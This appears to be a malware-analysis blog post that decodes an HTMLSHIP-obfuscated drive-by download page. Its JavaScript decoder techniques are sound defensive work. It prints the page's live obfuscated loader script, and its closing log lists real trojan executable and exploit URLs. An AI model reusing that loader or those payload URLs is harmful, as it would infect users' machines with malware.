March 14 Drive-by Download (挂马) Analysis Report

This time the focus is specifically on how to decode the new HTMLSHIP encoder..

Begin:

1、hxxp://s.rdeg42.cn/03/google.htm

Opening it, we get:

XML/HTML code:
  <hTmL><hEaD><Meta Name=Encoder Content=HTMLSHIP>
  <META HTTP-EQUIV="Expires" CONTENT="-1"><META NAME="robots" CONTENT="noindex"><META HTTP-EQUIV="Pragma" CONTENT="no-cache"><META HTTP-EQUIV="imagetoolbar" CONTENT="no"><noscript><iframe></iframe></noscript><sCrIpT lAnGuAgE="jAvAsCrIpT"><!--
  rA57=311;function gM0(hL78){nN64("%3B%66%6F%72%28%76%61%72%20%6C%4D%37%33%3D%30%3B%6C%4D%37%33%3C%31%36%3B%6C%4D%37%33%2B%2B%29%7B%76%61%72%20%72%65%31%3D%6E%65%77%20%52%65%67%45%78%70%28%64%58%38%32%2E%63%68%61%72%41%74%28%6C%4D%37%33%29%2C%5B%22%67%22%5D%29%3B%6B%47%31%30%3D%6B%47%31%30%2E%72%65%70%6C%61%63%65%28%72%65%31%2C%22%25%22%2B%72%52%36%37%2E%63%68%61%72%41%74%28%6C%4D%37%33%29%29%3B%76%61%72%20%72%65%32%3D%6E%65%77%20%52%65%67%45%78%70%28%64%58%38%32%2E%63%68%61%72%41%74%28%6C%4D%37%33%2B%31%36%29%2C%5B%22%67%22%5D%29%3B%6B%47%31%30%3D%6B%47%31%30%2E%72%65%70%6C%61%63%65%28%72%65%32%2C%22%25%75%22%2B%72%52%36%37%2E%63%68%61%72%41%74%28%6C%4D%37%33%29%29%3B%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%6B%47%31%30%29%29%3B")};gM0(0.5209838,eval(unescape("%62%4C%33%34%3D%38%37%37%35%3B%69%66%28%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%7B%66%75%6E%63%74%69%6F%6E%20%5F%64%6D%28%29%7B%72%65%74%75%72%6E%20%66%61%6C%73%65%7D%3B%66%75%6E%63%74%69%6F%6E%20%5F%6D%64%6D%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%6F%6E%63%6F%6E%74%65%78%74%6D%65%6E%75%3D%5F%64%6D%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%5F%6D%64%6D%28%29%22%2C%38%30%30%29%7D%3B%5F%6D%64%6D%28%29%3B%7D%64%6F%63%75%6D%65%6E%74%2E%6F%6E%63%6F%6E%74%65%78%74%6D%65%6E%75%3D%6E%65%77%20%46%75%6E%63%74%69%6F%6E%28%22%72%65%74%75%72%6E%20%66%61%6C%73%65%22%29%3B%66%75%6E%63%74%69%6F%6E%20%5F%6E%64%6D%28%65%29%7B%69%66%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%7C%7C%77%69%6E%64%6F%77%2E%73%69%64%65%62%61%72%29%7B%69%66%28%65%2E%77%68%69%63%68%21%3D%31%29%72%65%74%75%72%6E%20%66%61%6C%73%65%3B%7D%7D%3B%69%66%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%29%7B%64%6F%63%75%6D%65%6E%74%2E%63%61%70%74%75%72%65%45%76%65%6E%74%73%28%45%76%65%6E%74%2E%4D%4F%55%53%45%44%4F%57%4E%29%3B%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%64%6F%77%6E%3D%5F%6E%64%6D%3B%7D%65%6C%73%65%7B%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%75%70%3D%5F%6E%64%6D%3B%7D%3B%61%59%39%33%3D%39%39%31%38%3B%7
0%57%35%38%3D%33%39%31%39%3B%66%75%6E%63%74%69%6F%6E%20%5F%64%77%73%28%29%7B%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%20%3D%20%22%20%22%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%5F%64%77%73%28%29%22%2C%31%30%30%29%3B%7D%3B%5F%64%77%73%28%29%3B%67%47%36%34%3D%36%37%37%37%3B%6D%4A%33%37%3D%37%33%34%37%3B%66%75%6E%63%74%69%6F%6E%20%5F%64%64%73%28%29%7B%69%66%28%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%7B%64%6F%63%75%6D%65%6E%74%2E%6F%6E%73%65%6C%65%63%74%73%74%61%72%74%3D%66%75%6E%63%74%69%6F%6E%20%28%29%7B%72%65%74%75%72%6E%20%66%61%6C%73%65%7D%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%5F%64%64%73%28%29%22%2C%37%30%30%29%7D%7D%3B%5F%64%64%73%28%29%3B%75%52%38%38%3D%31%39%32%31%3B%6B%50%35%33%3D%35%39%32%33%3B%69%66%28%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%70%72%6F%74%6F%63%6F%6C%2E%69%6E%64%65%78%4F%66%28%22%66%69%6C%65%22%29%21%3D%2D%31%29%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%22%3B%72%45%36%37%3D%35%33%35%30%3B%78%48%34%31%3D%35%39%32%30%3B%66%75%6E%63%74%69%6F%6E%20%5F%6E%72%28%29%7B%72%65%74%75%72%6E%20%74%72%75%65%7D%6F%6E%65%72%72%6F%72%3D%5F%6E%72%3B%77%56%31%3D%37%30%36%32%3B%6C%53%36%36%3D%31%30%36%34%3B%66%75%6E%63%74%69%6F%6E%20%5F%64%70%62%28%29%7B%66%6F%72%28%69%3D%30%3B%69%3C%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%69%66%28%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%5B%69%5D%2E%73%74%79%6C%65%2E%76%69%73%69%62%69%6C%69%74%79%21%3D%22%68%69%64%64%65%6E%22%29%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%5B%69%5D%2E%73%74%79%6C%65%2E%76%69%73%69%62%69%6C%69%74%79%3D%22%68%69%64%64%65%6E%22%3B%7D%3B%77%69%6E%64%6F%77%2E%6F%6E%62%65%66%6F%72%65%70%72%69%6E%74%3D%5F%64%70%62%3B%63%44%37%31%3D%33%39%32%32%3B%69%47%34%35%3D%34%34%39%32%3B%78%59%31%33%3D%32%32%30%33%3B%6E%57%37%38%3D%36%32%30%35%3B%75%4D%39%32%3D%35%36%33%32%3B%74%45%34%38%3D%33%30%36%34%3B%73%52%38%3D%34%32%30%37%3B%69%50%37%33%3D%38%32%30%38%3B%66%4B%39%35%3D%34%32%30%34%3B%65%43%35%32%3D%31%36%33%36%3B%75%56%32%30%3D%39%33%34%38%3B%6A%54%38%35%3D%33%33%34%39%
3B%71%49%39%39%3D%32%37%37%36%3B%3B%5F%6C%69%63%65%6E%73%65%64%5F%74%6F%5F%3D%22%68%75%79%75%66%65%6E%67%22%3B%6E%4E%36%34%3D%66%75%6E%63%74%69%6F%6E%28%73%29%7B%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%73%29%29%7D%3B%69%57%33%37%3D%33%31%36%33%3B")),0.9121885,nN64("%64%58%38%32%3D%22%4D%52%4C%74%53%58%76%4A%49%4F%51%6C%6A%48%6F%71%57%6E%72%6D%4B%78%68%73%54%69%70%50%56%6B%77%4E%22%3B%72%52%36%37%3D%22%30%31%32%33%34%35%36%37%38%39%41%42%43%44%45%46%22"),0.8430054,kG10="L2LBL2LBL2LBL2LBL2LBL2LBL2LBL2MDMAtCX3S3X2S9X0X4L0SCS1SES7X5S1S7S5tDL2vAv1J6v1J3v3J2v9J0J4L2tEMDMAJ7v9vEv4vFJ7LEvFvEv5J2J2vFJ2tDv6J5vEv3J4v9vFvEL8L9JBJ2v5J4J5J2vEL0J4J2J5v5tBJDMDMAv6J5vEv3J4v9vFvEL0v9vEv9J4L8L9JBv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L9tBJDMDMAJ7v9vEv4vFJ7LEvFvEvCvFv1v4L0tDL0v9vEv9J4tBMDMAv9v6L8v4vFv3J5vDv5vEJ4LEv3vFvFvBv9v5LEv9vEv4v5J8SFv6L8L2J7J5v4v9J8v9v1vFJAv9tDL2L9tDtDLDt1L9MDMAJBMDMAJ6v1J2L0vBv2vBJ3tDL2vBv2J3J4v7L2tBMDMAJ6v1J2L0J3vBJ0v1vFJ0v1vFtDvEv5J7L0S4v1J4v5L8L9tBMDMAJ6v1J2L0v5J8J0v9J2v5J3tDvEv5J7L0S4v1J4v5L8L9tBMDMAv5J8J0v9J2v5J3LEJ3v5J4X4v9vDv5L8v5J8J0v9J2v5J3LEv7v5J4X4v9vDv5L8L9LBt2t4LAt6t0LAt6t0LAt1t0t0t0L9tBMDMAv4vFv3J5vDv5vEJ4LEv3vFvFvBv9v5tDL2J7J5v4v9J8v9v1vFJAv9tDX9v5J3tBJ0v1J4v8tDLFtBv5J8J0v9J2v5J3tDL2LBv5J8J0v9J2v5J3LEJ4vFS7SDX4X3J4J2v9vEv7L8L9tBMDMAv9v6L8vEv1J6v9v7v1J4vFJ2LEJ5J3v5J2S1v7v5vEJ4LEJ4vFSCvFJ7v5J2S3v1J3v5L8L9LEv9vEv4v5J8SFv6L8L2vDJ3v9v5L2L9tEt0L9MDMAJBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCvFv2vAv5v3J4L0v3vCv1J3J3v9v4tDL2v3vCJ3v9v4tAv4t2t7v3v4v2L2LBL2t6v5LDv1v5t6v4LDt1t1v3v6LDt9t6v2t8LDt4t4t4t5t5t3t5t4t0t0t0t0L2L0v3vFv4v5v2v1J3v5tDL2v8J4J4J0tALFLFv4vFJ7vEvCvFv1v4LEvDv1v3J2vFvDv5v4v9v1LEv3vFvDLFJ0J5v2LFJ3v8vFv3vBJ7v1J6v5LFv3v1v2J3LFv6vCv1J3v8LFJ3J7v6vCv1J3v8LEv3v1v2L3J6v5J2J3v9vFvEtDt4LCt0LCt1t9LCt0L2L0J7v9v4J4v8tDL2t0L2L0v8v5v9v7v8J4tDL2t0L2L0v1vCv9v7vEtDL2vDv9v4v4vCv5L2tEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCJ0v1J2v1vDL0vEv1vDv5tDL2v1vCvCvFJ7X3v3J2v9J0J4S1v3v3v5J3J3L2L0J6v1vCJ5v5tDL2J3v1vDv5S4vFvDv1v9vEL2LFtEL7L9tBMDMAMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7
tCJ0v1J2v1vDL0vEv1vDv5tDL2vDvFJ6v9v5L2L0J6v1vCJ5v5tDL2v9v5LEJ3J7v6L2LFtEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCJ0v1J2v1vDL0vEv1vDv5tDL2J1J5v1vCv9J4J9L2L0J6v1vCJ5v5tDL2v8v9v7v8L2LFtEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCJ0v1J2v1vDL0vEv1vDv5tDL2v2v7v3vFvCvFJ2L2L0J6v1vCJ5v5tDL2L3v6v6v6v6v6v6L2LFtEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCv5vDv2v5v4L0J3J2v3tDL2v9v5LEJ3J7v6L2LFtEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCLFvFv2vAv5v3J4tEL7L9tBMDMAJDMDMAv5vCJ3v5MDMAJBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L2tCS5SDS2S5S4L0J3J2v3tDv6v6LEJ3J7v6L0J7v9v4J4v8tDt0L0v8v5v9v7v8J4tDt0tEL2L9tBMDMAJDMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5vCvEL8L2tCv9v6J2v1vDv5L0J3J2v3tDv1vCvCLEv8J4vDL0J7v9v4J4v8tDt1t0t0L0v8v5v9v7v8J4tDt0tEtCXCLFv9v6J2v1vDv5tEL2L9tBJDMDMAMDMAtCLFX3S3X2S9X0X4tEMDMAtCLFS2SFS4X9tEtCLFS8X4SDSCtE");//--></sCrIpT></hEaD><boDY><noscript><b><font color=red>这个页面需要Javascript支持的浏览器!!!  

Code portion: the JavaScript is the <sCrIpT lAnGuAgE="jAvAsCrIpT"><!-- ... //--></sCrIpT> block in the page source above.

This code... the much-hyped Malzilla can't decode it.

But some people said that 小g's online decoder can crack it.

I tried it, and it really does decode it. 小g once said that the principle behind his tool is simply replacing document.write.

Looking at the decoder's source code,

you can find the following:

JavaScript code:
  function hook()
  {
      var hooks = document.write;          // keep the original write()
      document.write = function(s)
      {
          txt.value = s;                   // dump the written HTML into a textarea instead of rendering it
      }
  }
  hook();
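As an added example (not code from the post and not 小g's decoder), here is the same idea done statically, with no eval at all: a JavaScript decoder that reproduces the gM0() substitution using the dX82 / rR67 table values the page sets inside its nN64() call, a document.write hook of the kind shown above that captures output instead of rendering it, and a check for the HTMLSHIP <meta> marker. The sample input is a fragment of the page's own kG10 string; the fake document object and the function names are assumptions of mine.

```javascript
// Added example, not from the original post: a static decoder for the
// HTMLSHIP layer plus the document.write hook used by 小g's online decoder.
// Table values are the ones the page sets inside nN64(): dX82 and rR67.
const ALPHABET = "MRLtSXvJIOQljHoqWnrmKxhsTipPVkwN"; // dX82 on the page
const HEX = "0123456789ABCDEF";                       // rR67 on the page

// Equivalent of gM0(): alphabet letters 0..15 stand for "%" + hex digit,
// letters 16..31 for "%u" + hex digit; everything else (the literal low
// nibbles and the %uXXXX tail digits) passes through unchanged. A single
// pass gives the same result as the page's 32 chained RegExp.replace calls
// because none of the output characters ("%", "u", 0-9, A-F) is in the alphabet.
function htmlshipToEscaped(encoded, alphabet = ALPHABET, hex = HEX) {
  let out = "";
  for (const ch of encoded) {
    const i = alphabet.indexOf(ch);
    if (i < 0) out += ch;
    else if (i < 16) out += "%" + hex[i];
    else out += "%u" + hex[i - 16];
  }
  return out;
}

// Same result as the legacy unescape(): %XX and %uXXXX sequences become
// characters, anything else is left alone. Written out so no eval is needed.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

function htmlshipDecode(encoded) {
  return jsUnescape(htmlshipToEscaped(encoded));
}

// The hook trick: replace doc.write with a function that stores its argument
// instead of rendering it, run the obfuscated stage unmodified, restore the
// original. doc is a real document in a browser; here it is a plain object.
function captureWrites(doc, stage) {
  const captured = [];
  const original = doc.write;
  doc.write = (s) => { captured.push(String(s)); };
  try { stage(doc); } finally { doc.write = original; }
  return captured;
}

// Triage check: the encoder announces itself in the page's first <meta> tag.
function hasHtmlshipMarker(html) {
  return /<meta\s+name=["']?encoder["']?\s+content=["']?htmlship/i.test(html);
}

// Fragment of the page's kG10 string: the document.writeln(...) that drops the
// hidden all.htm iframe. The rest of kG10 decodes with the same table.
const SAMPLE =
  "v4vFv3J5vDv5vEJ4LEJ7J2v9J4v5vCvEL8L2tCv9v6J2v1vDv5L0J3J2v3tDv1vCvC" +
  "LEv8J4vDL0J7v9v4J4v8tDt1t0t0L0v8v5v9v7v8J4tDt0tEtCXCLFv9v6J2v1vDv5tEL2L9tB";

// Stands in for the last statement of gM0(): document.write(unescape(kG10)).
function decoderStage(doc) {
  doc.write(htmlshipDecode(SAMPLE));
}

// Hypothetical document object: without the hook, the write would throw
// instead of silently rendering the decoded HTML.
const fakeDocument = { write() { throw new Error("would have rendered"); } };
console.log(captureWrites(fakeDocument, decoderStage)[0]);
// prints: document.writeln("<iframe src=all.htm width=100 height=0><\/iframe>");
```

Running it prints the decoded fragment, document.writeln("<iframe src=all.htm width=100 height=0><\/iframe>");, which is the hidden iframe that pulls in all.htm (compare the Level 1 all.htm entry in the log further down). A page encoded with a different 32-letter alphabet only needs its own dX82 / rR67 values pasted in; the substitution logic is the same.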

Er.. but why can't we find document.write?

First unescape it (document.write is hidden inside the percent-encoded strings passed to nN64)

then look carefully

and you'll see document.write..

But at this point you can't just change it to alert in the unescaped text: the page only unescapes those strings inside eval at run time, so the patch has to go into the escaped form.

First restore it to escaped form,

then escape-encode document.write.

Here's an escape-encoding script (by X祥)

JS version:

JavaScript code:
  <script>
  // Percent-escape every character of a as %XX (same output as escape() for plain ASCII)
  var a = "document.write";
  var b = '', c, hex;
  var hexStr = "0123456789ABCDEF";
  var low, high;
  for (c = 0; c < a.length; c++)
  {
    low = a.charCodeAt(c) % 16;              // low nibble
    high = (a.charCodeAt(c) - low) / 16;     // high nibble (valid for character codes below 256)
    hex = "" + hexStr.charAt(high) + hexStr.charAt(low);
    b = b + '%' + hex;
  }

  alert(b);
  </script>

VBS version (thanks to X祥 for the highlighted code):

VBS code:
  <script language="vbscript">
  dim a,i,e
  a="document.write"
  ' Mid() is 1-based, so the loop starts at 1; hex(asc()) gives the two hex digits of each ASCII byte
  for i=1 to len(a)
    e=e & "%" & hex(asc(mid(a,i,1)))
  next
  msgbox e
  </script>

Then you get:

Escaped code:
  %64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65

Then escape alert the same way; the code is the same as the escape script above, just with document.write swapped for alert.

Then find %64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65 in the HTML

and replace it with %61%6c%65%72%74 (alert in escaped form).

Then load it in a browser and it decodes itself...

PS: 耗子 once said that in anything X祥 writes, the variables are always a or b... today that's been confirmed...

Since some people say I didn't fully decode it... let's finish the job..

Decoding log for hxxp://s.rdeg42.cn/03/google.htm (full output - 41):

Level  0>http://s.rdeg42.cn/03/google.htm
Level  1>http://s.rdeg42.cn/03/ie.swf  ●
Level  2>http://s.rdeg42.cn/03/win%209,0,115,0i.swf  ●
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  1>http://s.rdeg42.cn/03/ff.swf  ●
Level  2>http://s.rdeg42.cn/03/win%209,0,115,0f.swf  ●
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  1>http://s.rdeg42.cn/03/all.htm
Level  2>http://s.rdeg42.cn/03/5.htm
Level  3>http://s.rdeg42.cn/03/5.js
Level  4>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/0.htm
Level  3>http://w1.fsdfe.com/01/l1.exe  ●
Level  2>http://s.rdeg42.cn/03/4.htm
Level  3>http://s.rdeg42.cn/03/4.js
Level  4>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/3.htm
Level  3>http://s.rdeg42.cn/03/3.js
Level  4>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/2.htm
Level  2>http://s.rdeg42.cn/03/uu.htm
Level  3>http://s.rdeg42.cn/03/uu.txt
Level  2>http://s.rdeg42.cn/03/cx.htm
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/bf.htm
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/office.htm
Level  3>http://s.rdeg42.cn/03/office.js
Level  4>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/s.htm
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/newlz.htm
Level  3>http://s.rdeg42.cn/03/lz.js
Level  4>http://w1.fsdfe.com/game3130/l.exe  ●
Level  2>http://s.rdeg42.cn/03/6.htm
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/b.htm
Level  3>http://w1.fsdfe.com/01/baidu.cab  ●
Level  2>http://s.rdeg42.cn/03/1.htm
Level  3>http://s.rdeg42.cn/03/1.js
Level  4>http://w1.fsdfe.com/01/l.exe  ●

Log by aarwwefdds (the dotted entries are all real trojan addresses, except the swf files)
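As an added example, not part of the original post or log: a small JavaScript parser for the "Level N>url ●" format that rebuilds each redirect chain from the level numbers and lists the payload URLs, applying the rule stated above that dotted entries are the trojan downloads except for the .swf files. The log excerpt inside is copied from the output above; the function names are mine.

```javascript
// Added example, not part of the original post or log: parse the
// "Level N>url ●" decoding log, rebuild each redirect chain from the levels,
// and list the payload URLs. LOG_EXCERPT is copied from the log above;
// function names are mine.
const LOG_EXCERPT = `
Level  0>http://s.rdeg42.cn/03/google.htm
Level  1>http://s.rdeg42.cn/03/ie.swf  ●
Level  2>http://s.rdeg42.cn/03/win%209,0,115,0i.swf  ●
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  1>http://s.rdeg42.cn/03/all.htm
Level  2>http://s.rdeg42.cn/03/0.htm
Level  3>http://w1.fsdfe.com/01/l1.exe  ●
Level  2>http://s.rdeg42.cn/03/b.htm
Level  3>http://w1.fsdfe.com/01/baidu.cab  ●
Level  2>http://s.rdeg42.cn/03/newlz.htm
Level  3>http://s.rdeg42.cn/03/lz.js
Level  4>http://w1.fsdfe.com/game3130/l.exe  ●
`;

// One entry per "Level N>url [●]" line; ● is the author's mark for a real
// trojan fetch. Lines that do not match the format are skipped.
function parseChainLog(text) {
  const entries = [];
  for (const raw of text.split("\n")) {
    const m = /^Level\s+(\d+)>(\S+)(?:\s+(●))?$/.exec(raw.trim());
    if (!m) continue;
    entries.push({ level: Number(m[1]), url: m[2], marked: m[3] === "●" });
  }
  return entries;
}

// Each entry's parent is the most recent earlier entry one level up, so a
// stack indexed by level reconstructs the full path from the landing page.
function buildChains(entries) {
  const stack = [];
  const chains = [];
  for (const e of entries) {
    if (e.level > stack.length) throw new Error("level jump at " + e.url);
    stack.length = e.level;          // drop everything deeper than the parent
    stack[e.level] = e.url;
    chains.push({ path: stack.slice(), marked: e.marked });
  }
  return chains;
}

// Distinct download URLs to block or hunt for: marked entries, minus the .swf
// files, which the author excludes from the list of real trojan addresses.
function payloadUrls(entries) {
  const seen = new Set();
  for (const e of entries) {
    if (e.marked && !/\.swf$/i.test(e.url)) seen.add(e.url);
  }
  return [...seen];
}

// Distinct hosts in the chain (landing page and payload servers).
function hosts(entries) {
  return [...new Set(entries.map((e) => new URL(e.url).hostname))];
}

const entries = parseChainLog(LOG_EXCERPT);
for (const c of buildChains(entries)) {
  if (c.marked) console.log(c.path.join(" -> "));
}
console.log(payloadUrls(entries));
console.log(hosts(entries));
```

Each printed chain reads from the landing page down to the file that was fetched, so a proxy-log search for any one host in the output finds the whole chain; the payload list is what goes to the blocklist.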
